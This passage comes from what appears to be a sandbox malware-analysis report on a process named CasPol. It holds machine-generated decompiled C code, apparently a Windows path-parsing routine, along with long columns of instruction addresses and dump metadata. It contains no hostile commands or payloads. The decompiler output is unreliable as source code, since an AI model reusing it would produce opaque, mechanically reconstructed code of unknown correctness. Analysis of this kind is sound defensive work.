						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}
































































                                                                        0x0148dfce
                                                                        0x0148dfdd
                                                                        0x0148dfe1
                                                                        0x0148dfe3
                                                                        0x0148dfea
                                                                        0x0148e49c
                                                                        0x0148e49c
                                                                        0x0148e49e
                                                                        0x0148e4b0
                                                                        0x0148e4b0
                                                                        0x0148dff0
                                                                        0x0148dff5
                                                                        0x00000000
                                                                        0x0148e003
                                                                        0x0148e003
                                                                        0x0148e006
                                                                        0x0148e00b
                                                                        0x0148e00e
                                                                        0x0148e014
                                                                        0x0148e07d
                                                                        0x0148e07d
                                                                        0x0148e080
                                                                        0x0148e0d6
                                                                        0x0148e0dc
                                                                        0x0148e0de
                                                                        0x0148e0de
                                                                        0x0148e0e2
                                                                        0x0148e0e5
                                                                        0x0148e0ea
                                                                        0x0148e0ea
                                                                        0x0148e0ed
                                                                        0x0148e0ef
                                                                        0x0148e0f2
                                                                        0x0148e0f4
                                                                        0x0148e0f4
                                                                        0x0148e0f4
                                                                        0x0148e0f4
                                                                        0x0148e0f9
                                                                        0x0148e100
                                                                        0x0148e105
                                                                        0x0148e108
                                                                        0x0148e10b
                                                                        0x0148e10f
                                                                        0x0148e112
                                                                        0x0148e116
                                                                        0x0148e119
                                                                        0x0148e11d
                                                                        0x0148e122
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e124
                                                                        0x0148e127
                                                                        0x0148e12c
                                                                        0x0148e197
                                                                        0x0148e199
                                                                        0x0148e19b
                                                                        0x0148e1b8
                                                                        0x0148e1b8
                                                                        0x0148e1bc
                                                                        0x0148e1c4
                                                                        0x0148e1c8
                                                                        0x0148e1cd
                                                                        0x0148e1d2
                                                                        0x0148e1dc
                                                                        0x0148e1e1
                                                                        0x0148e1e3
                                                                        0x0148e1e3
                                                                        0x0148e1e6
                                                                        0x0148e1ea
                                                                        0x0148e1f2
                                                                        0x0148e1f8
                                                                        0x0148e1fa
                                                                        0x0148e1fd
                                                                        0x0148e201
                                                                        0x0148e204
                                                                        0x0148e208
                                                                        0x0148e20b
                                                                        0x0148e20f
                                                                        0x0148e214
                                                                        0x0148e258
                                                                        0x0148e258
                                                                        0x0148e258
                                                                        0x0148e25d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e267
                                                                        0x0148e26d
                                                                        0x0148e26f
                                                                        0x0148e2a3
                                                                        0x0148e2a3
                                                                        0x0148e2a6
                                                                        0x0148e2ac
                                                                        0x0148e2b5
                                                                        0x0148e2ba
                                                                        0x0148e2bd
                                                                        0x0148e2c5
                                                                        0x0148e418
                                                                        0x0148e418
                                                                        0x0148e451
                                                                        0x0148e45e
                                                                        0x0148e460
                                                                        0x0148e463
                                                                        0x0148e469
                                                                        0x0148e46b
                                                                        0x0148e46e
                                                                        0x0148e470
                                                                        0x00000000
                                                                        0x0148e470
                                                                        0x0148e2cd
                                                                        0x0148e2dc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e2e2
                                                                        0x0148e2e8
                                                                        0x0148e2ec
                                                                        0x0148e2ec
                                                                        0x0148e2fb
                                                                        0x0148e303
                                                                        0x0148e305
                                                                        0x0148e30a
                                                                        0x0148e47d
                                                                        0x0148e483
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e485
                                                                        0x0148e485
                                                                        0x0148e487
                                                                        0x0148e48a
                                                                        0x0148e48f
                                                                        0x0148e495
                                                                        0x00000000
                                                                        0x0148e310
                                                                        0x0148e310
                                                                        0x0148e310
                                                                        0x0148e315
                                                                        0x0148e328
                                                                        0x0148e32f
                                                                        0x0148e331
                                                                        0x0148e331
                                                                        0x0148e336
                                                                        0x0148e340
                                                                        0x0148e34b
                                                                        0x0148e34f
                                                                        0x0148e351
                                                                        0x0148e35f
                                                                        0x0148e35f
                                                                        0x0148e374
                                                                        0x0148e377
                                                                        0x0148e3e6
                                                                        0x0148e3e9
                                                                        0x0148e3f5
                                                                        0x0148e3f7
                                                                        0x0148e3fa
                                                                        0x0148e3ff
                                                                        0x0148e40a
                                                                        0x0148e410
                                                                        0x0148e415
                                                                        0x0148e415
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e379
                                                                        0x0148e379
                                                                        0x0148e379
                                                                        0x0148e37c
                                                                        0x0148e37f
                                                                        0x0148e37f
                                                                        0x0148e382
                                                                        0x0148e388
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e38c
                                                                        0x0148e3b6
                                                                        0x0148e3c1
                                                                        0x0148e3c6
                                                                        0x0148e3c8
                                                                        0x0148e3ce
                                                                        0x0148e3d0
                                                                        0x0148e3d3
                                                                        0x0148e3d3
                                                                        0x0148e3d8
                                                                        0x0148e3d8
                                                                        0x0148e3db
                                                                        0x0148e3e2
                                                                        0x00000000
                                                                        0x0148e353
                                                                        0x0148e353
                                                                        0x0148e355
                                                                        0x0148e355
                                                                        0x0148e356
                                                                        0x0148e358
                                                                        0x0148e35b
                                                                        0x00000000
                                                                        0x0148e355
                                                                        0x0148e351
                                                                        0x0148e317
                                                                        0x0148e31c
                                                                        0x0148e323
                                                                        0x0148e326
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e31e
                                                                        0x0148e31e
                                                                        0x0148e31e
                                                                        0x0148e31f
                                                                        0x0148e31f
                                                                        0x00000000
                                                                        0x0148e31e
                                                                        0x0148e30a
                                                                        0x00000000
                                                                        0x0148e26f
                                                                        0x0148e269
                                                                        0x0148e26b
                                                                        0x00000000
                                                                        0x0148e26b
                                                                        0x0148e216
                                                                        0x0148e219
                                                                        0x0148e21e
                                                                        0x0148e29f
                                                                        0x0148e286
                                                                        0x0148e288
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e28a
                                                                        0x0148e294
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e29a
                                                                        0x0148e252
                                                                        0x0148e255
                                                                        0x00000000
                                                                        0x0148e271
                                                                        0x0148e27b
                                                                        0x0148e283
                                                                        0x00000000
                                                                        0x0148e283
                                                                        0x0148e1d4
                                                                        0x0148e1d4
                                                                        0x00000000
                                                                        0x0148e1d4
                                                                        0x0148e19d
                                                                        0x0148e19d
                                                                        0x0148e1a7
                                                                        0x0148e1a9
                                                                        0x0148e1a9
                                                                        0x0148e1ae
                                                                        0x00000000
                                                                        0x0148e1ae
                                                                        0x0148e15d
                                                                        0x0148e160
                                                                        0x0148e163
                                                                        0x0148e166
                                                                        0x0148e166
                                                                        0x0148e169
                                                                        0x0148e169
                                                                        0x0148e16e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e177
                                                                        0x0148e17d
                                                                        0x0148e17f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e18d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e18f
                                                                        0x00000000
                                                                        0x0148e18f
                                                                        0x0148e179
                                                                        0x0148e17b
                                                                        0x00000000
                                                                        0x0148e17b
                                                                        0x0148e0f4
                                                                        0x0148e082
                                                                        0x0148e085
                                                                        0x0148e0cd
                                                                        0x0148e0d3
                                                                        0x0148e0d5
                                                                        0x00000000
                                                                        0x0148e0d5
                                                                        0x0148e087
                                                                        0x0148e08a
                                                                        0x0148e0c4
                                                                        0x0148e0ca
                                                                        0x0148e0cc
                                                                        0x00000000
                                                                        0x0148e0cc
                                                                        0x0148e08c
                                                                        0x0148e08f
                                                                        0x0148e0bb
                                                                        0x0148e0c1
                                                                        0x0148e0c3
                                                                        0x00000000
                                                                        0x0148e0c3
                                                                        0x0148e091
                                                                        0x0148e094
                                                                        0x0148e0b2
                                                                        0x0148e0b8
                                                                        0x0148e0ba
                                                                        0x00000000
                                                                        0x0148e0ba
                                                                        0x0148e096
                                                                        0x0148e099
                                                                        0x0148e0a9
                                                                        0x0148e0af
                                                                        0x0148e0b1
                                                                        0x00000000
                                                                        0x0148e0b1
                                                                        0x0148e09e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e0a6
                                                                        0x0148e0a8
                                                                        0x00000000
                                                                        0x0148e0a8
                                                                        0x0148e018
                                                                        0x0148e01b
                                                                        0x0148e01e
                                                                        0x0148e023
                                                                        0x0148e025
                                                                        0x0148e062
                                                                        0x0148e06a
                                                                        0x0148e06e
                                                                        0x0148e073
                                                                        0x0148e075
                                                                        0x0148e075
                                                                        0x0148e07a
                                                                        0x00000000
                                                                        0x0148e07a

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e25fb2de5feeb20ab1b5640a1f35d7b6b6643f8a0902752bc76b466a90a14ce
                                                                        • Instruction ID: f1537aa8bbe59bf46c6af9d90b1b5a1830766816b8b7dc081ebf487e0be16f8f
                                                                        • Opcode Fuzzy Hash: 5e25fb2de5feeb20ab1b5640a1f35d7b6b6643f8a0902752bc76b466a90a14ce
                                                                        • Instruction Fuzzy Hash: 49F1B572F002268BDB18EE9DC9D05BEFBF5AB59200B09426AD916FB391D734DD41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E013D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x14ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E013EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E013D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L013D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E013D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M013D45F8))) {
												case 0:
													_v568 = 0x1391078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x13911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L013D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E013FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E013FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E013B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E013CEB70(1, 0x14a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E013CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E013F95D0();
																			L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E013FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E013F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E013FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                        0x013d4128
                                                                        0x013d4135
                                                                        0x013d413c
                                                                        0x013d4141
                                                                        0x013d4145
                                                                        0x013d4147
                                                                        0x013d414e
                                                                        0x013d4151
                                                                        0x013d4159
                                                                        0x013d415c
                                                                        0x013d4160
                                                                        0x013d4164
                                                                        0x013d4168
                                                                        0x013d416c
                                                                        0x013d417f
                                                                        0x013d4181
                                                                        0x013d446a
                                                                        0x013d446a
                                                                        0x013d418c
                                                                        0x013d4195
                                                                        0x013d4199
                                                                        0x013d4432
                                                                        0x013d4439
                                                                        0x013d443d
                                                                        0x013d4442
                                                                        0x013d4447
                                                                        0x00000000
                                                                        0x013d419f
                                                                        0x013d41a3
                                                                        0x013d41b1
                                                                        0x013d41b9
                                                                        0x013d41bd
                                                                        0x013d45db
                                                                        0x013d45db
                                                                        0x00000000
                                                                        0x013d41c3
                                                                        0x013d41c3
                                                                        0x013d41ce
                                                                        0x013d41d4
                                                                        0x0141e138
                                                                        0x0141e13e
                                                                        0x0141e169
                                                                        0x0141e16d
                                                                        0x0141e19e
                                                                        0x0141e16f
                                                                        0x0141e16f
                                                                        0x0141e175
                                                                        0x0141e179
                                                                        0x0141e18f
                                                                        0x0141e193
                                                                        0x00000000
                                                                        0x0141e199
                                                                        0x00000000
                                                                        0x0141e199
                                                                        0x0141e193
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d41da
                                                                        0x013d41da
                                                                        0x013d41df
                                                                        0x013d41e4
                                                                        0x013d41ec
                                                                        0x013d4203
                                                                        0x013d4207
                                                                        0x0141e1fd
                                                                        0x013d4222
                                                                        0x013d4226
                                                                        0x0141e1f3
                                                                        0x0141e1f3
                                                                        0x013d422c
                                                                        0x013d422c
                                                                        0x013d4233
                                                                        0x0141e1ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d4239
                                                                        0x013d4239
                                                                        0x013d4239
                                                                        0x013d4239
                                                                        0x013d4233
                                                                        0x013d4226
                                                                        0x013d41ee
                                                                        0x013d41ee
                                                                        0x013d41f4
                                                                        0x013d4575
                                                                        0x0141e1b1
                                                                        0x0141e1b1
                                                                        0x00000000
                                                                        0x013d457b
                                                                        0x013d457b
                                                                        0x013d4582
                                                                        0x0141e1ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d4588
                                                                        0x013d4588
                                                                        0x013d458c
                                                                        0x0141e1c4
                                                                        0x0141e1c4
                                                                        0x00000000
                                                                        0x013d4592
                                                                        0x013d4592
                                                                        0x013d4599
                                                                        0x0141e1be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d459f
                                                                        0x013d459f
                                                                        0x013d45a3
                                                                        0x0141e1d7
                                                                        0x0141e1e4
                                                                        0x00000000
                                                                        0x013d45a9
                                                                        0x013d45a9
                                                                        0x013d45b0
                                                                        0x0141e1d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d45b6
                                                                        0x013d45b6
                                                                        0x013d45b6
                                                                        0x00000000
                                                                        0x013d45b6
                                                                        0x013d45b0
                                                                        0x013d45a3
                                                                        0x013d4599
                                                                        0x013d458c
                                                                        0x013d4582
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d41f4
                                                                        0x013d423e
                                                                        0x013d4241
                                                                        0x013d45c0
                                                                        0x013d45c4
                                                                        0x00000000
                                                                        0x013d45ca
                                                                        0x013d45ca
                                                                        0x00000000
                                                                        0x0141e207
                                                                        0x0141e20f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d45d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d45ca
                                                                        0x00000000
                                                                        0x013d4247
                                                                        0x013d4247
                                                                        0x013d4247
                                                                        0x013d4249
                                                                        0x013d4249
                                                                        0x013d4249
                                                                        0x013d4251
                                                                        0x013d4251
                                                                        0x013d4257
                                                                        0x013d425f
                                                                        0x013d426e
                                                                        0x013d4270
                                                                        0x013d427a
                                                                        0x0141e219
                                                                        0x0141e219
                                                                        0x013d4280
                                                                        0x013d4282
                                                                        0x013d4456
                                                                        0x013d45ea
                                                                        0x00000000
                                                                        0x013d45f0
                                                                        0x0141e223
                                                                        0x00000000
                                                                        0x0141e223
                                                                        0x013d445c
                                                                        0x013d445c
                                                                        0x00000000
                                                                        0x013d445c
                                                                        0x00000000
                                                                        0x013d4288
                                                                        0x013d428c
                                                                        0x0141e298
                                                                        0x013d4292
                                                                        0x013d4292
                                                                        0x013d429e
                                                                        0x013d42a3
                                                                        0x013d42a7
                                                                        0x013d42ac
                                                                        0x0141e22d
                                                                        0x013d42b2
                                                                        0x013d42b2
                                                                        0x013d42b9
                                                                        0x013d42bc
                                                                        0x013d42c2
                                                                        0x013d42ca
                                                                        0x013d42cd
                                                                        0x013d42cd
                                                                        0x013d42d4
                                                                        0x013d433f
                                                                        0x013d433f
                                                                        0x013d42d6
                                                                        0x013d42d6
                                                                        0x013d42d9
                                                                        0x013d42dd
                                                                        0x013d42eb
                                                                        0x0141e23a
                                                                        0x013d42f1
                                                                        0x013d4305
                                                                        0x013d430d
                                                                        0x013d4315
                                                                        0x013d4318
                                                                        0x013d431f
                                                                        0x013d4322
                                                                        0x013d432e
                                                                        0x013d433b
                                                                        0x013d433b
                                                                        0x00000000
                                                                        0x013d432e
                                                                        0x013d42eb
                                                                        0x013d434c
                                                                        0x013d434e
                                                                        0x013d4352
                                                                        0x013d4359
                                                                        0x013d435e
                                                                        0x013d4361
                                                                        0x013d436e
                                                                        0x013d438a
                                                                        0x013d438e
                                                                        0x013d4396
                                                                        0x013d439e
                                                                        0x013d43a1
                                                                        0x013d43ad
                                                                        0x013d43bb
                                                                        0x013d43bb
                                                                        0x013d43ad
                                                                        0x013d436e
                                                                        0x013d43bf
                                                                        0x013d43c5
                                                                        0x013d4463
                                                                        0x013d4463
                                                                        0x013d43ce
                                                                        0x013d43d5
                                                                        0x013d43d9
                                                                        0x013d43df
                                                                        0x013d4475
                                                                        0x013d4479
                                                                        0x013d4491
                                                                        0x013d4491
                                                                        0x013d4479
                                                                        0x013d43e5
                                                                        0x013d43eb
                                                                        0x013d43f4
                                                                        0x013d43f6
                                                                        0x013d43f9
                                                                        0x013d43fc
                                                                        0x013d43ff
                                                                        0x013d44e8
                                                                        0x013d44ed
                                                                        0x013d44f3
                                                                        0x0141e247
                                                                        0x00000000
                                                                        0x013d44f9
                                                                        0x013d4504
                                                                        0x013d4508
                                                                        0x013d450f
                                                                        0x0141e269
                                                                        0x00000000
                                                                        0x013d4515
                                                                        0x013d4519
                                                                        0x013d4531
                                                                        0x013d4534
                                                                        0x013d4537
                                                                        0x013d453e
                                                                        0x013d4541
                                                                        0x013d454a
                                                                        0x0141e255
                                                                        0x0141e255
                                                                        0x0141e25b
                                                                        0x0141e25e
                                                                        0x0141e261
                                                                        0x0141e261
                                                                        0x013d4555
                                                                        0x013d4559
                                                                        0x013d455d
                                                                        0x0141e26d
                                                                        0x0141e270
                                                                        0x0141e274
                                                                        0x0141e27a
                                                                        0x0141e27d
                                                                        0x0141e28e
                                                                        0x0141e28e
                                                                        0x013d4563
                                                                        0x013d4563
                                                                        0x013d4569
                                                                        0x013d4569
                                                                        0x00000000
                                                                        0x013d455d
                                                                        0x013d450f
                                                                        0x00000000
                                                                        0x013d44f3
                                                                        0x013d43ff
                                                                        0x013d4405
                                                                        0x013d4405
                                                                        0x013d4405
                                                                        0x013d42ac
                                                                        0x013d428c
                                                                        0x013d4282
                                                                        0x013d4407
                                                                        0x013d440d
                                                                        0x0141e2af
                                                                        0x0141e2af
                                                                        0x013d4413
                                                                        0x013d4413
                                                                        0x00000000
                                                                        0x013d41d4
                                                                        0x00000000
                                                                        0x013d41c3
                                                                        0x013d41bd
                                                                        0x013d4415
                                                                        0x013d4415
                                                                        0x013d4416
                                                                        0x013d4417
                                                                        0x013d4429
                                                                        0x013d416e
                                                                        0x013d416e
                                                                        0x013d4175
                                                                        0x013d4498
                                                                        0x013d449f
                                                                        0x0141e12d
                                                                        0x00000000
                                                                        0x0141e133
                                                                        0x00000000
                                                                        0x0141e133
                                                                        0x013d44a5
                                                                        0x013d44a5
                                                                        0x013d44aa
                                                                        0x00000000
                                                                        0x013d44bb
                                                                        0x013d44ca
                                                                        0x013d44d6
                                                                        0x013d44d7
                                                                        0x013d44d8
                                                                        0x013d44e3
                                                                        0x013d44e3
                                                                        0x013d44aa
                                                                        0x013d417b
                                                                        0x013d417b
                                                                        0x013d417b
                                                                        0x00000000
                                                                        0x013d417b
                                                                        0x013d4175
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
